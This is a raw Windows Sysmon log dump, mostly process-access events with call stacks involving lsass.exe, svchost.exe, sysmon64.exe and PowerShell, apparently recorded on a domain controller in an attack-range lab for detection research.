13:52:26.118{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.071{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.071{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.024{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ktb4ic2k.bwk.ps12020-12-08 13:52:26.024 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.009{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.993{10ACEC4A-8519-5FCF-D302-000000009001}43364828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd222516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c3120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c2df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd1746d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc683987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6e1e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c54bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c54bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6b72d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c3804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c33f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c3120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c2df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd1746d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6a9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6a9222(wow64) 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-851B-5FCF-E102-000000009001}43522924C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 